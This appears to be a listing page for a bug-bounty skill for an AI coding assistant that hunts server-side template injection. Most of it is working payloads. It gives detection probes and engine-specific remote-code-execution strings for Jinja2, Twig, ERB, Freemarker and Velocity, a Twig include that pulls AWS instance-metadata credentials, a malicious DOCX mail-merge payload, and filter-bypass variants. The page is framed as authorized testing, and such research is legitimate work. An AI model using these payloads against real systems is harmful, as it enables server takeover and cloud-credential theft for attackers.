Stats
Actions
Tags
From claude-bughunter
Hunts server-side template injection (SSTI) across Jinja2, Twig, Freemarker, ERB, Spring, Velocity, Mako, Thymeleaf, Smarty, with detection probes and engine-specific RCE escalation.
How this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:hunt-sstiThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
> Easy to detect, high payout ($2K–$8K). Direct path to RCE.
Easy to detect, high payout ($2K–$8K). Direct path to RCE.
{{7*7}} → 49 = Jinja2 / Twig
${7*7} → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %> → 49 = ERB (Ruby)
*{7*7} → 49 = Spring Thymeleaf
{{7*'7'}} → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.
Jinja2 (Python/Flask):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
Twig (PHP/Symfony):
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
ERB (Ruby):
<%= `id` %>
Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected
hunt-rce — SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2 {{config.__class__.__init__.__globals__['os'].popen('id').read()}} or Freemarker <#assign x="freemarker.template.utility.Execute"?new()>${x("id")} → unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.hunt-xss — When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same {{7*7}} reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject <script> into rendered email template → stored XSS hitting every recipient who views the message.hunt-ssrf — Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig {{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }} or Jinja2 with url_for/custom filters → AWS metadata exfil → cloud creds.hunt-file-upload — Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whose word/document.xml contains ${T(java.lang.Runtime).getRuntime().exec("id")} to a Velocity/Freemarker-driven mail-merge → RCE.security-arsenal — Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N] index hunting), Twig _self.env registerUndefinedFilterCallback, Freemarker ?new() Execute, ERB backticks, Velocity $class.inspect, Smarty {php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes, {%print(...)%}).triage-validation — Apply the Pre-Severity Gate before claiming Critical RCE. A {{7*7}} → 49 reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Prove id/OOB DNS callback with a unique marker before writing the report.npx claudepluginhub elementalsouls/claude-bughunterSSTI testing checklist: template engine identification (Jinja2, Twig, Freemarker, Pebble, Velocity), polyglot detection, engine-specific RCE payloads, blind SSTI, and filter bypass.
Detects and exploits Server-Side Template Injection (SSTI) vulnerabilities across Jinja2, Twig, Freemarker, and other template engines to achieve remote code execution during authorized penetration tests.
Detects and exploits Server-Side Template Injection (SSTI) vulnerabilities in Jinja2, Twig, Freemarker, and other engines to achieve RCE during authorized pentests of web apps with templating.